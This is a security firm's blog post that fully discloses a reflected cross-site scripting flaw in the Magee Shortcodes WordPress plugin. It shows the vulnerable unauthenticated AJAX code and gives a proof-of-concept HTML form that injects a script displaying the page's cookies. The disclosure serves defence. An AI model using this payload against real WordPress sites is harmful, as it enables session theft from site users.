28 Sep

Full Disclosure of Reflected Cross-Site Scripting (XSS) Vulnerability in Plugin with 30,000+ Active Installs

To close out our first week of full disclosing vulnerabilities in WordPress plugins until the people on the WordPress side of things finally clean up the moderation of their Support Forum, we return back to something from the first day and a reminder of an example of why the Support Forum moderators behavior is harmful to actually improving security. We and others other often find additional vulnerabilities based on seeing reports of other vulnerabilities (and with our Plugin Security Checker tool we help find even more), so that makes the moderators deletion of reports of them on the Support Forum have a negative impact on improving security. Of course there is the other side of having the details of these vulnerabilities public, especially if they haven’t been fixed, but the best solution is to get them fixed. Once something has been disclosed it would be foolish to assume that people with bad intentions haven’t seen it, but the people on the WordPress side of things don’t seem to have a great grasp as to how the Internet works. Thus the most important thing is to make sure the vulnerability is fixed, but what seems to usually happen is that the moderators simply delete the reports and then don’t actually bother to notify anyone that could do anything about fixing the vulnerability. That was the case with the first plugin we full disclosed.

On Tuesday we discussed how Janek Vind’s report on reflected cross-site scripting (XSS) vulnerability in FV Flowplayer Video Player, lead to us check the 1,000 most popular plugins to get an idea of if there might be similar issues in other plugins while considering adding a check for some instances of them to our Plugin Security Checker. Through that we found just such a vulnerability in a plugin with 700,000+ active installations according to wordpress.org. We also added a check that would catch that to our Plugin Security Checker.

We also found a related vulnerability in the plugin Magee Shortcodes, which has 30,000+ active installations according to wordpress.org, though not one that the Plugin Security Checker can catch due the more complicated path the variable used in it goes.

The plugin registers the function say() to be accessible through WordPress’ AJAX functionality whether the requester is logged in or not:

add_action('wp_ajax_say', array(&$this, 'say'));
add_action('wp_ajax_nopriv_say', array(&$this, 'say'));

In that function the value of the variable $shortcode is run through the do_shortcode() function and then output:

echo do_shortcode($shortcode);

Prior to that, code brings in user input in various locations and combines that in to the $shortcode variable. In playing around with modifying the standard input for that, we found an input where JavaScript code could get output through that line of code, as can be seen the proof of concept below, which is reflected cross-site (XSS) vulnerability. This type of vulnerability has almost no chance of being exploited on the average website, unless you were to believe the misinformation put out by other security companies.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in alert box when logged in to WordPress. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=say" method="POST">
<input type="hidden" name="name" value="pullquote" />
<input type="hidden" name="preview[0][name]" value="magee_align" />
<input type="hidden" name="preview[0][value]" value="]<script>alert(document.cookie);</script>" />
<input type="hidden" name="preview[1][name]" value="magee_content" />
<input type="hidden" name="preview[1][value]" value="" />
<input type="hidden" name="preview[2][name]" value="magee_class" />
<input type="hidden" name="preview[2][value]" value="" />
<input type="hidden" name="preview[3][name]" value="magee_id" />
<input type="hidden" name="preview[3][value]" value="" />
<input type="hidden" name="preview[4][name]" value="magee-shortcode" />
<input type="hidden" name="preview[4][value]" value="pullquote" />
<input type="hidden" name="preview[5][name]" value="magee-shortcode-textarea" />
<input type="hidden" name="preview[5][value]" value="" />
<input type="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.